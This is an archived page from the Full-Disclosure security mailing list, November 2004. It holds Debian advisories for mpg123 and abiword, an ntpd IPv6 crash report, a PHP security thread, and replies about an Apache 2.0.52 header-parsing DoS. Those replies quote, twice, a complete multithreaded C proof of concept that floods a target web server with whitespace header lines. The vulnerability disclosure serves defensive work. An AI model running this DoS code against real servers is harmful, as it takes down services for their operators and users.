OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

  • application/octet-stream attachment: Price.scr
 
[Full-Disclosure] [SECURITY] [DSA 578-1] New mpg123 packages fix arbitrary code execution

debian-security-announcelists.debian.org
Date: Mon Nov 01 2004 - 07:33:16 CST

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 578-1 securitydebian.org
http://www.debian.org/security/ Martin Schulze
November 1st, 2004 http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package : mpg123
Vulnerability : buffer overflow
Problem-Type : remote
Debian-specific: no
CVE ID : CAN-2004-0982

Carlos Barros has discovered a buffer overflow in the HTTP
authentication routine of mpg123, a popular (but non-free) MPEG layer
1/2/3 audio player. If a user opened a malicious playlist or URL, an
attacker might execute arbitrary code with the rights of the calling
user.

For the stable distribution (woody) this problem has been fixed in
version 0.59r-13woody4.

For the unstable distribution (sid) this problem has been fixed in
version 0.59r-17.

We recommend that you upgrade your mpg123 package.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.0 alias woody
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/non-free/m/mpg123/mpg123_0.59r-13woody4.dsc
      Size/MD5 checksum: 748 386de2941605795a833ccdddf200f26b
    http://security.debian.org/pool/updates/non-free/m/mpg123/mpg123_0.59r-13woody4.diff.gz
      Size/MD5 checksum: 24568 bf98712baa4bb429768762ea9c20404a
    http://security.debian.org/pool/updates/non-free/m/mpg123/mpg123_0.59r.orig.tar.gz
      Size/MD5 checksum: 159028 95df59ad1651dd2346d49fafc83747e7

  Alpha architecture:

    http://security.debian.org/pool/updates/non-free/m/mpg123/mpg123_0.59r-13woody4_alpha.deb
      Size/MD5 checksum: 94630 18738b85cf26807ea4d29b1c82767d63
    http://security.debian.org/pool/updates/non-free/m/mpg123/mpg123-esd_0.59r-13woody4_alpha.deb
      Size/MD5 checksum: 94590 f550ba5af79ae1bf5f8024178c391e0c

  ARM architecture:

    http://security.debian.org/pool/updates/non-free/m/mpg123/mpg123_0.59r-13woody4_arm.deb
      Size/MD5 checksum: 89708 6b5bc7522cf6e91c7ec21662f8809bc3

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/non-free/m/mpg123/mpg123_0.59r-13woody4_i386.deb
      Size/MD5 checksum: 81688 9c5fb2322632dc72d64e18ec404abad8
    http://security.debian.org/pool/updates/non-free/m/mpg123/mpg123-esd_0.59r-13woody4_i386.deb
      Size/MD5 checksum: 81642 a06e8185f9b0da320ab46c348e55be5a
    http://security.debian.org/pool/updates/non-free/m/mpg123/mpg123-nas_0.59r-13woody4_i386.deb
      Size/MD5 checksum: 83626 a00b78f948d8967ec23cb2874847f638
    http://security.debian.org/pool/updates/non-free/m/mpg123/mpg123-oss-3dnow_0.59r-13woody4_i386.deb
      Size/MD5 checksum: 81334 204b7db5b537d81741f04dee9bf80a40
    http://security.debian.org/pool/updates/non-free/m/mpg123/mpg123-oss-i486_0.59r-13woody4_i386.deb
      Size/MD5 checksum: 87940 0c9d0b30b8a832f30de5cc3d29c321b0

  HP Precision architecture:

    http://security.debian.org/pool/updates/non-free/m/mpg123/mpg123_0.59r-13woody4_hppa.deb
      Size/MD5 checksum: 97516 428e9dd2c7805424976c82f7aa37e54b

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/non-free/m/mpg123/mpg123_0.59r-13woody4_m68k.deb
      Size/MD5 checksum: 75998 b08ad56ec624c0f8a3624596cef423ea

  PowerPC architecture:

    http://security.debian.org/pool/updates/non-free/m/mpg123/mpg123_0.59r-13woody4_powerpc.deb
      Size/MD5 checksum: 88528 442b5e1d2462121fcfb1c4eda82429f3
    http://security.debian.org/pool/updates/non-free/m/mpg123/mpg123-esd_0.59r-13woody4_powerpc.deb
      Size/MD5 checksum: 88448 d885597a3cb24ae2d92309def283ab5b

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/non-free/m/mpg123/mpg123_0.59r-13woody4_sparc.deb
      Size/MD5 checksum: 88776 b905ba3b69cc2196cc9d84ddefb9b16b

  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announcelists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.5 (GNU/Linux)

iD8DBQFBhjsbW5ql+IAeqTIRApHrAJ4m83ekW9Gm+H/Ke4sp+RMASjwjbwCfYUU1
ro+9qiQHpADqYb3mbusTkg8=
=YBAn
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] ntpd segfaults accessing IPv6 hosts

From: Bernhard Kuemel (bernhardbksys.at)
Date: Mon Nov 01 2004 - 08:12:26 CST

Hi full-disclosure!

ntpd 1:4.2.0a-11 (as in debian testing/sarge and unstable/sid)
segfaults when accessing ntp servers on IPv6 hosts. I don't know
whether this bug is exploitable. But such a server on
pool.ntp.org might DoS many servers.

There is a fixed version available.

For more details see http://bugzilla.ntp.org/show_bug.cgi?id=353

Bernhard

--
Webspace; Low end Serverhousing ab 15 e, etc.: http://www.bksys.at
Linux Admin/Programmierer: http://bksys.at/bernhard/services.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] DoS in Apache 2.0.52 ?

From: Chintan Trivedi (chesschintangmail.com)
Date: Mon Nov 01 2004 - 08:46:23 CST

I had tested first time on vmware image and it had crashed.(Its not
having unnecessary modules installed. )
The other tests which i did was on office mate's machine. That guy is
running http apache server with (Mandrake Linux/6mdk) mod_ssl
OpenSSL/0.9.7c DAV/2 PHP/4.3.4 Server. His machine had come back to
normal state after long time. But when i had tried 3-4 times in
succession in very short intervals, the machine stopped responding.

I see that IIS 5.1 treats any line containing only <space> as a blank
line and terminates the connection. Why does apache have to wait till
8K x 8K spaces ?

On Mon, 01 Nov 2004 11:02:20 -0300, Mauro Flores <almaurics.com.uy> wrote:
> I made a Linux version of your PoC and attack an Apache 2.0.52 +
> Mod_security + Mod_ssl + Mod_proxy and couldn't reproduce the DoS.
> 50 threads for more than 5 minutes throw Internet (not in the local
> network).
>
> Regards, Mauro Flores
>
>
>
> On Mon, 2004-11-01 at 06:57, Chintan Trivedi wrote:
> > Hi,
> >
> > I was doing some testing on Apache webserver ver 2.0.52 (unix) and
> > previous versions. Just found that a special type of request consumes
> > lot of CPU usage and hangs the webserver. It even hangs other services
> > like ssh, ftp ..
> >
> > For Apache 2.0.52 a request like
> > GET / HTTP/1.0\n
> > [space] x 8000\n
> > [space] x 8000\n
> > [space] x 8000\n
> > .
> > .
> > 8000 times
> >
> > consumes a lot of cpu.
> >
> > I created 25 threads (connections) and send the above request to one
> > webserver. After just 2-3 minutes of flooding, the server wasnt able
> > to fulfill any http requests. Even ssh and such other services well
> > also hanged up. The time required for the attack was just maximum 5
> > minutes.
> >
> > I am not sure whether it is a valid DoS or not. Replacing the <space>
> > with any other char will break the connection just after a few
> > lines(130 or so) of header. Checking the
> > httpd-2.0.52/server/protocol.c file i see the code for the mime
> > headers. It checks for the first char of the header. If it is a "space" it
> > considers it as an extension to the previous line header. The problem
> > seems to be similar to the advisory published by Guninsky few weeks
> > ago -> http://www.guninski.com/httpd1.html thought its a bit
> > different. That fix was for the long request field header when the
> > header line is extended in the next line using space.
> >
> > Well i guess 8K limit for the number of headers filled with spaces is
> > quite huge. Its enuf to DoS the server using a few threads.
> >
> > You can check the attached C file to test it. The file is compiled on
> > windows system using VC++ 6.0.
> >
> > -----------------POC----------------------------
> > /// Apache 2.0.52 and earlier DoS
> >
> > #include "stdafx.h"
> > #include "winsock.h"
> > #include "string.h"
> > #include "stdio.h"
> > #include "windows.h"
> > #pragma comment(lib,"ws2_32")
> >
> > DWORD WINAPI attack(LPVOID);
> > char target[256];
> >
> > int main(int argc, char* argv[])
> > {
> > int l=0;
> > int j;
> > DWORD dw;
> > HANDLE hd;
> > if(argc<2)
> > {
> > printf("usage: %s target", argv[0]);
> > exit(0);
> > }
> >
> > strncpy(target, argv[1], 256);
> > printf("Attaching %s ...\n", target);
> > for(j=0;j<50;j++)
> > hd=CreateThread(NULL,0, attack, (LPVOID) l , 0, &dw);
> >
> > for(j=0;j<50;j++)
> > WaitForSingleObject(hd, INFINITE);
> >
> > printf ("done");
> > return 0;
> > }
> >
> > DWORD WINAPI attack(LPVOID l)
> > {
> > int s;
> > SOCKADDR_IN sck;
> > HOSTENT *host;
> > char buff[256];
> > char space[8000];
> > int i;
> >
> > WSADATA wsadata;
> >
> > WSAStartup(MAKEWORD(1,1),&wsadata);
> >
> > memset(space, ' ', 8000);
> > space[7998]='\n';
> > space[7999]='\0';
> >
> > if((host=gethostbyname(target))==NULL)
> > {
> > printf("Host not found");
> > return -1;
> > }
> > sck.sin_family = PF_INET;
> > memcpy(&sck.sin_addr.s_addr, host->h_addr, host->h_length );
> > sck.sin_port = htons(80);
> >
> > if((s=socket(AF_INET,SOCK_STREAM,0))==-1)
> > {
> > printf("Socket couldn't be initiallized");
> > return -1;
> > }
> > if((connect(s,(struct sockaddr *)&sck,sizeof(sck))))
> > {
> > printf("Couldn't connect");
> > return -1;
> > }
> >
> > sprintf(buff, "GET / HTTP/1.0\n");
> > //printf("%s",buff);
> > int len=strlen(buff);
> >
> > if((send(s,buff,len,0))==-1)
> > {
> > printf ("send error");
> > closesocket(s);
> > return -1;
> > }
> >
> > for(i=0;i<9999;i++)
> > {
> >
> > if((send(s,space,strlen(space),0))==-1)
> > {
> > printf("Send Error on header number %d", i);
> > closesocket(s);
> > return -1;
> > }
> >
> > }
> > closesocket(s);
> > return 0;
> > }
> > ------------------------------------------------
> >
> > _______________________________________________
>
>
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html
> >
>
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] DoS in Apache 2.0.52 ?

From: Mauro Flores (almaurics.com.uy)
Date: Mon Nov 01 2004 - 08:02:20 CST

I made a Linux version of your PoC and attack an Apache 2.0.52 +
Mod_security + Mod_ssl + Mod_proxy and couldn't reproduce the DoS.
50 threads for more than 5 minutes throw Internet (not in the local
network).

Regards, Mauro Flores

On Mon, 2004-11-01 at 06:57, Chintan Trivedi wrote:
> Hi,
>
> I was doing some testing on Apache webserver ver 2.0.52 (unix) and
> previous versions. Just found that a special type of request consumes
> lot of CPU usage and hangs the webserver. It even hangs other services
> like ssh, ftp ..
>
> For Apache 2.0.52 a request like
> GET / HTTP/1.0\n
> [space] x 8000\n
> [space] x 8000\n
> [space] x 8000\n
> .
> .
> 8000 times
>
> consumes a lot of cpu.
>
> I created 25 threads (connections) and send the above request to one
> webserver. After just 2-3 minutes of flooding, the server wasnt able
> to fulfill any http requests. Even ssh and such other services well
> also hanged up. The time required for the attack was just maximum 5
> minutes.
>
> I am not sure whether it is a valid DoS or not. Replacing the <space>
> with any other char will break the connection just after a few
> lines(130 or so) of header. Checking the
> httpd-2.0.52/server/protocol.c file i see the code for the mime
> headers. It checks for the first char of the header. If it is a "space" it
> considers it as an extension to the previous line header. The problem
> seems to be similar to the advisory published by Guninsky few weeks
> ago -> http://www.guninski.com/httpd1.html thought its a bit
> different. That fix was for the long request field header when the
> header line is extended in the next line using space.
>
> Well i guess 8K limit for the number of headers filled with spaces is
> quite huge. Its enuf to DoS the server using a few threads.
>
> You can check the attached C file to test it. The file is compiled on
> windows system using VC++ 6.0.
>
> -----------------POC----------------------------
> /// Apache 2.0.52 and earlier DoS
>
> #include "stdafx.h"
> #include "winsock.h"
> #include "string.h"
> #include "stdio.h"
> #include "windows.h"
> #pragma comment(lib,"ws2_32")
>
> DWORD WINAPI attack(LPVOID);
> char target[256];
>
> int main(int argc, char* argv[])
> {
> int l=0;
> int j;
> DWORD dw;
> HANDLE hd;
> if(argc<2)
> {
> printf("usage: %s target", argv[0]);
> exit(0);
> }
>
> strncpy(target, argv[1], 256);
> printf("Attaching %s ...\n", target);
> for(j=0;j<50;j++)
> hd=CreateThread(NULL,0, attack, (LPVOID) l , 0, &dw);
>
> for(j=0;j<50;j++)
> WaitForSingleObject(hd, INFINITE);
>
> printf ("done");
> return 0;
> }
>
> DWORD WINAPI attack(LPVOID l)
> {
> int s;
> SOCKADDR_IN sck;
> HOSTENT *host;
> char buff[256];
> char space[8000];
> int i;
>
> WSADATA wsadata;
>
> WSAStartup(MAKEWORD(1,1),&wsadata);
>
> memset(space, ' ', 8000);
> space[7998]='\n';
> space[7999]='\0';
>
> if((host=gethostbyname(target))==NULL)
> {
> printf("Host not found");
> return -1;
> }
> sck.sin_family = PF_INET;
> memcpy(&sck.sin_addr.s_addr, host->h_addr, host->h_length );
> sck.sin_port = htons(80);
>
> if((s=socket(AF_INET,SOCK_STREAM,0))==-1)
> {
> printf("Socket couldn't be initiallized");
> return -1;
> }
> if((connect(s,(struct sockaddr *)&sck,sizeof(sck))))
> {
> printf("Couldn't connect");
> return -1;
> }
>
> sprintf(buff, "GET / HTTP/1.0\n");
> //printf("%s",buff);
> int len=strlen(buff);
>
> if((send(s,buff,len,0))==-1)
> {
> printf ("send error");
> closesocket(s);
> return -1;
> }
>
> for(i=0;i<9999;i++)
> {
>
> if((send(s,space,strlen(space),0))==-1)
> {
> printf("Send Error on header number %d", i);
> closesocket(s);
> return -1;
> }
>
> }
> closesocket(s);
> return 0;
> }
> ------------------------------------------------
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] How secure is PHP ?

From: Meder Kydyraliev (medero0o.nu)
Date: Mon Nov 01 2004 - 08:29:04 CST

You should check out 'study in scarlet' also, which points out some of the
common programming/configuration mistakes:

http://www.securereality.com.au/studyinscarlet.txt

Meder

On Mon, Nov 01, 2004 at 07:13:14PM +0530, Sandeep Sengupta wrote:
> Hi Nayana,
>
> 1) All BUGS on PHP are listed here. So you can have good idea of the bug-stat.
> http://bugs.php.net/bugstats.php
>
> Total bug entries in system: 30352
> Closed: 17087 Open: 1267 Critical: 4
>
> -----
>
> Some more resources ---
>
> 2) http://www.developer.com/lang/article.php/918141
> On the Security of PHP, Part 1 - Jordan Dimov
>
> 3) http://www.devshed.com/c/a/PHP/PHP-Security-Mistakes/
> PHP Security Mistakes - Dave Clark
>
> The security of the application depends mostly on 'how you code',
> which I believe you already know. I hope the above links will be of
> some help. Good luck :-)
>
> Warm regards,
> Sandeep.
>
> -----Original Message-----
> From: Nayana Somaratna [mailto:npsomaratnagmail.com]
> Sent: Tue 02/11/2004 00:45
> To: full-disclosurelists.netsys.com
> Cc:
> Subject: [Full-Disclosure] How secure is PHP ?
> Hi everyone,
>
> I've been tasked with creating a learning management system for my
> University. Given that we're only handling a few handred students, I'd
> typically want to create it using linux/apache/mysql/php.
>
> However, when browsing the web, I found an article which said that "it
> requires an expert to lockdown php" (Sorry, but I can't quite recall
> the URL).
>
> While I am not a novice, I am defintely not an expert either -
> expecially on security issues.
>
> So, I'd like to ask the members of this list - how difficult is it to
> secure php ? Do you really need a security "expert" to do this ?
>
> P.S. The few hundred students mentioned above are IT students ;-)
>
> Thanks,
>
> - Nayana
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] DoS in Apache 2.0.52 ?

From: Michal Zalewski (lcamtufghettot.org)
Date: Mon Nov 01 2004 - 09:38:42 CST

On Mon, 1 Nov 2004, Chintan Trivedi wrote:

> GET / HTTP/1.0\n
> [space] x 8000\n
> [space] x 8000\n
> [space] x 8000\n
> .
> .
> 8000 times

> I created 25 threads (connections) and send the above request to one
> webserver.

This is circa 1.5 GB of data (61 MB per connection), at which point you
probably either caused an (improperly configured) server to kill random
processes on OOM, or swapped it to death.

This seems to be a valid DoS, and Apache most certainly should refuse such
an attack (historically, they had several other header parsing flaws).
This attack is probably not particularly efficient, compared to, say, a
good old connection flood, should you have 1.6 GB of bandwidth to spare.

/mz

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] [SECURITY] [DSA 579-1] New abiword packages fix arbitrary code execution

debian-security-announcelists.debian.org
Date: Mon Nov 01 2004 - 09:51:45 CST

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 579-1 securitydebian.org
http://www.debian.org/security/ Martin Schulze
November 1st, 2004 http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package : abiword
Vulnerability : buffer overflow
Problem-Type : remote
Debian-specific: no
CVE ID : CAN-2004-0645

A buffer overflow vulnerability has been disovered in the wv library,
used for converting and previewing word documents. On exploition an
attacker could execute arbitrary code with the privileges of the user
running the vulnerable application.

For the stable distribution (woody) this problem has been fixed in
version 1.0.2+cvs.2002.06.05-1woody2.

The package in the unstable distribution (sid) is not affected.

We recommend that you upgrade your abiword package.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.0 alias woody
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/a/abiword/abiword_1.0.2+cvs.2002.06.05-1woody2.dsc
      Size/MD5 checksum: 1159 85bb20f96162736e29ade8d6558799d6
    http://security.debian.org/pool/updates/main/a/abiword/abiword_1.0.2+cvs.2002.06.05-1woody2.diff.gz
      Size/MD5 checksum: 48982 12356a29a3185ef367fd7a18a7374be0
    http://security.debian.org/pool/updates/main/a/abiword/abiword_1.0.2+cvs.2002.06.05.orig.tar.gz
      Size/MD5 checksum: 16407034 0b0e1f3e42a0627a28cea970b099049d

  Architecture independent components:

    http://security.debian.org/pool/updates/main/a/abiword/abiword-doc_1.0.2+cvs.2002.06.05-1woody2_all.deb
      Size/MD5 checksum: 950160 e102efac6a16ded87e5e437f687a0310
    http://security.debian.org/pool/updates/main/a/abiword/xfonts-abi_1.0.2+cvs.2002.06.05-1woody2_all.deb
      Size/MD5 checksum: 189372 96b1fd88bd7c779e692d1f97f4884992

  Alpha architecture:

    http://security.debian.org/pool/updates/main/a/abiword/abiword_1.0.2+cvs.2002.06.05-1woody2_alpha.deb
      Size/MD5 checksum: 12324 db3b4b84b9fe45dcbd3c2e50bdf3ea08
    http://security.debian.org/pool/updates/main/a/abiword/abiword-common_1.0.2+cvs.2002.06.05-1woody2_alpha.deb
      Size/MD5 checksum: 538558 745ddd234eebaba2d94b4dcb8482eb58
    http://security.debian.org/pool/updates/main/a/abiword/abiword-gnome_1.0.2+cvs.2002.06.05-1woody2_alpha.deb
      Size/MD5 checksum: 2069076 b15d6f04af7fe12637fbf3f98bff3570
    http://security.debian.org/pool/updates/main/a/abiword/abiword-gtk_1.0.2+cvs.2002.06.05-1woody2_alpha.deb
      Size/MD5 checksum: 1873718 f3c06b0ab36204d17bd7f35b8aaa9d9c
    http://security.debian.org/pool/updates/main/a/abiword/abiword-plugins_1.0.2+cvs.2002.06.05-1woody2_alpha.deb
      Size/MD5 checksum: 228192 0f93acbe004457b96665dfd404eb7a0d

  ARM architecture:

    http://security.debian.org/pool/updates/main/a/abiword/abiword_1.0.2+cvs.2002.06.05-1woody2_arm.deb
      Size/MD5 checksum: 12324 d79bb97457548ab36052e0e311168ac5
    http://security.debian.org/pool/updates/main/a/abiword/abiword-common_1.0.2+cvs.2002.06.05-1woody2_arm.deb
      Size/MD5 checksum: 536122 c9a40134dad59a82a902e734c8011f78
    http://security.debian.org/pool/updates/main/a/abiword/abiword-gnome_1.0.2+cvs.2002.06.05-1woody2_arm.deb
      Size/MD5 checksum: 1716898 e16c92223a1d79b11e13723dfe440b70
    http://security.debian.org/pool/updates/main/a/abiword/abiword-gtk_1.0.2+cvs.2002.06.05-1woody2_arm.deb
      Size/MD5 checksum: 1533466 519589fac25720cb9932949a16e435e9
    http://security.debian.org/pool/updates/main/a/abiword/abiword-plugins_1.0.2+cvs.2002.06.05-1woody2_arm.deb
      Size/MD5 checksum: 154748 69f4844084b35e02af75d2350970ae5f

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/a/abiword/abiword_1.0.2+cvs.2002.06.05-1woody2_i386.deb
      Size/MD5 checksum: 12316 56e899f5073f4ecf10b6cb29802da76f
    http://security.debian.org/pool/updates/main/a/abiword/abiword-common_1.0.2+cvs.2002.06.05-1woody2_i386.deb
      Size/MD5 checksum: 533908 f3d4e7035c0d0e9fcf6c53386f9305f6
    http://security.debian.org/pool/updates/main/a/abiword/abiword-gnome_1.0.2+cvs.2002.06.05-1woody2_i386.deb
      Size/MD5 checksum: 1677628 bafc31f34a7f940268acb69e708db7c8
    http://security.debian.org/pool/updates/main/a/abiword/abiword-gtk_1.0.2+cvs.2002.06.05-1woody2_i386.deb
      Size/MD5 checksum: 1491442 a87d8c81b54987eee14cfa5ad4cfa599
    http://security.debian.org/pool/updates/main/a/abiword/abiword-plugins_1.0.2+cvs.2002.06.05-1woody2_i386.deb
      Size/MD5 checksum: 219836 2de08d80c8581d9814047c11e41d98fc

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/a/abiword/abiword_1.0.2+cvs.2002.06.05-1woody2_ia64.deb
      Size/MD5 checksum: 12326 16aae240a8308465fcc04e7f9697d64a
    http://security.debian.org/pool/updates/main/a/abiword/abiword-common_1.0.2+cvs.2002.06.05-1woody2_ia64.deb
      Size/MD5 checksum: 542536 e9fcc8cb137cde1015f854c6383e803f
    http://security.debian.org/pool/updates/main/a/abiword/abiword-gnome_1.0.2+cvs.2002.06.05-1woody2_ia64.deb
      Size/MD5 checksum: 2121940 fb962d5debe790b0a9ea5da9b82f1500
    http://security.debian.org/pool/updates/main/a/abiword/abiword-gtk_1.0.2+cvs.2002.06.05-1woody2_ia64.deb
      Size/MD5 checksum: 1939620 d84fc2069f1af2ce581f6a876179c567
    http://security.debian.org/pool/updates/main/a/abiword/abiword-plugins_1.0.2+cvs.2002.06.05-1woody2_ia64.deb
      Size/MD5 checksum: 311806 1664fc9ec9ed17f7c355aa2b27c9cb27

  HP Precision architecture:

    http://security.debian.org/pool/updates/main/a/abiword/abiword_1.0.2+cvs.2002.06.05-1woody2_hppa.deb
      Size/MD5 checksum: 12322 fbe7366ac7c2d84eaa840c29bb0f0870
    http://security.debian.org/pool/updates/main/a/abiword/abiword-common_1.0.2+cvs.2002.06.05-1woody2_hppa.deb
      Size/MD5 checksum: 537778 0e13ea49a4bf688b99297c6fa60ddbe0
    http://security.debian.org/pool/updates/main/a/abiword/abiword-gnome_1.0.2+cvs.2002.06.05-1woody2_hppa.deb
      Size/MD5 checksum: 2039786 f91d12d4d6ba552a42cf4562d358f5f3
    http://security.debian.org/pool/updates/main/a/abiword/abiword-gtk_1.0.2+cvs.2002.06.05-1woody2_hppa.deb
      Size/MD5 checksum: 1821044 ed470c31af565d3a836dbaed6b5956c9
    http://security.debian.org/pool/updates/main/a/abiword/abiword-plugins_1.0.2+cvs.2002.06.05-1woody2_hppa.deb
      Size/MD5 checksum: 195742 8f70554c0e9fab92c733e084ac435796

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/a/abiword/abiword_1.0.2+cvs.2002.06.05-1woody2_m68k.deb
      Size/MD5 checksum: 12326 fda3aee08b6c7a36552c44c9e18dc2f3
    http://security.debian.org/pool/updates/main/a/abiword/abiword-common_1.0.2+cvs.2002.06.05-1woody2_m68k.deb
      Size/MD5 checksum: 533074 623de2757f85e5f40404ad7178600900
    http://security.debian.org/pool/updates/main/a/abiword/abiword-gnome_1.0.2+cvs.2002.06.05-1woody2_m68k.deb
      Size/MD5 checksum: 1602602 71341f13227b14ebebbdab7307170e5e
    http://security.debian.org/pool/updates/main/a/abiword/abiword-gtk_1.0.2+cvs.2002.06.05-1woody2_m68k.deb
      Size/MD5 checksum: 1416262 4123606f88103837cb0b1716e5332edc
    http://security.debian.org/pool/updates/main/a/abiword/abiword-plugins_1.0.2+cvs.2002.06.05-1woody2_m68k.deb
      Size/MD5 checksum: 199616 c8cbb04072b54b12e5d790d190ed5e20

  Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/a/abiword/abiword_1.0.2+cvs.2002.06.05-1woody2_mips.deb
      Size/MD5 checksum: 12324 2a9e9d8590cbff7e6eae6210dcda5963
    http://security.debian.org/pool/updates/main/a/abiword/abiword-common_1.0.2+cvs.2002.06.05-1woody2_mips.deb
      Size/MD5 checksum: 536334 34b58292b19a97c7caf03fa8649f9588
    http://security.debian.org/pool/updates/main/a/abiword/abiword-gnome_1.0.2+cvs.2002.06.05-1woody2_mips.deb
      Size/MD5 checksum: 1701150 4233b20af6d518aef680721c6e9d224f
    http://security.debian.org/pool/updates/main/a/abiword/abiword-gtk_1.0.2+cvs.2002.06.05-1woody2_mips.deb
      Size/MD5 checksum: 1513420 4e9ff72a764e615974d97bd1078955b6
    http://security.debian.org/pool/updates/main/a/abiword/abiword-plugins_1.0.2+cvs.2002.06.05-1woody2_mips.deb
      Size/MD5 checksum: 205038 d02601a4bf14e98e8b43f0773b25e0c4

  Little endian MIPS architecture:

    http://security.debian.org/pool/updates/main/a/abiword/abiword_1.0.2+cvs.2002.06.05-1woody2_mipsel.deb
      Size/MD5 checksum: 12322 33fbc540d53404e519a6696930e94193
    http://security.debian.org/pool/updates/main/a/abiword/abiword-common_1.0.2+cvs.2002.06.05-1woody2_mipsel.deb
      Size/MD5 checksum: 536470 367d3892a482f12e69f4a78ab94925b9
    http://security.debian.org/pool/updates/main/a/abiword/abiword-gnome_1.0.2+cvs.2002.06.05-1woody2_mipsel.deb
      Size/MD5 checksum: 1663230 72a084359b72dbb54d77ccf5fc2dbc5f
    http://security.debian.org/pool/updates/main/a/abiword/abiword-gtk_1.0.2+cvs.2002.06.05-1woody2_mipsel.deb
      Size/MD5 checksum: 1480868 f3e424b1b36eef3bcb52c422e36393ec
    http://security.debian.org/pool/updates/main/a/abiword/abiword-plugins_1.0.2+cvs.2002.06.05-1woody2_mipsel.deb
      Size/MD5 checksum: 202908 a145263d08da2e5dad0d611869180def

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/a/abiword/abiword_1.0.2+cvs.2002.06.05-1woody2_powerpc.deb
      Size/MD5 checksum: 12316 e4d9763a95a99175919c1da05fbd35d7
    http://security.debian.org/pool/updates/main/a/abiword/abiword-common_1.0.2+cvs.2002.06.05-1woody2_powerpc.deb
      Size/MD5 checksum: 534710 596bbd310236e97c3d967ff6fac45e2a
    http://security.debian.org/pool/updates/main/a/abiword/abiword-gnome_1.0.2+cvs.2002.06.05-1woody2_powerpc.deb
      Size/MD5 checksum: 1716300 a77a54353c0f17ae35f363931dae7d47
    http://security.debian.org/pool/updates/main/a/abiword/abiword-gtk_1.0.2+cvs.2002.06.05-1woody2_powerpc.deb
      Size/MD5 checksum: 1527752 1d6a0d11fb0a4c0d59e3a84b9457964d
    http://security.debian.org/pool/updates/main/a/abiword/abiword-plugins_1.0.2+cvs.2002.06.05-1woody2_powerpc.deb
      Size/MD5 checksum: 211422 bdf81bbb6ad1e18ba5140a06d4ba6493

  IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/a/abiword/abiword_1.0.2+cvs.2002.06.05-1woody2_s390.deb
      Size/MD5 checksum: 12322 41066489465b7dc84e7512a8b2467215
    http://security.debian.org/pool/updates/main/a/abiword/abiword-common_1.0.2+cvs.2002.06.05-1woody2_s390.deb
      Size/MD5 checksum: 535134 7bee77890a9237f6a45d44c9a6fa3fb0
    http://security.debian.org/pool/updates/main/a/abiword/abiword-gnome_1.0.2+cvs.2002.06.05-1woody2_s390.deb
      Size/MD5 checksum: 1603758 13a836f504b4698bce96b010e6c6a1ef
    http://security.debian.org/pool/updates/main/a/abiword/abiword-gtk_1.0.2+cvs.2002.06.05-1woody2_s390.deb
      Size/MD5 checksum: 1417836 da47311e33507bccba7da3ff9eb9a890
    http://security.debian.org/pool/updates/main/a/abiword/abiword-plugins_1.0.2+cvs.2002.06.05-1woody2_s390.deb
      Size/MD5 checksum: 203140 bdaa7fe49b1fb7097e9bf7d8fec42d5c

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/a/abiword/abiword_1.0.2+cvs.2002.06.05-1woody2_sparc.deb
      Size/MD5 checksum: 12326 af26ffe3a8a0c96f62f5a93003e11c77
    http://security.debian.org/pool/updates/main/a/abiword/abiword-common_1.0.2+cvs.2002.06.05-1woody2_sparc.deb
      Size/MD5 checksum: 537396 0b7459a387b34d02fcdf200948022936
    http://security.debian.org/pool/updates/main/a/abiword/abiword-gnome_1.0.2+cvs.2002.06.05-1woody2_sparc.deb
      Size/MD5 checksum: 1656854 67a1f7d6d4cc1d0a2c120a61e9983ac2
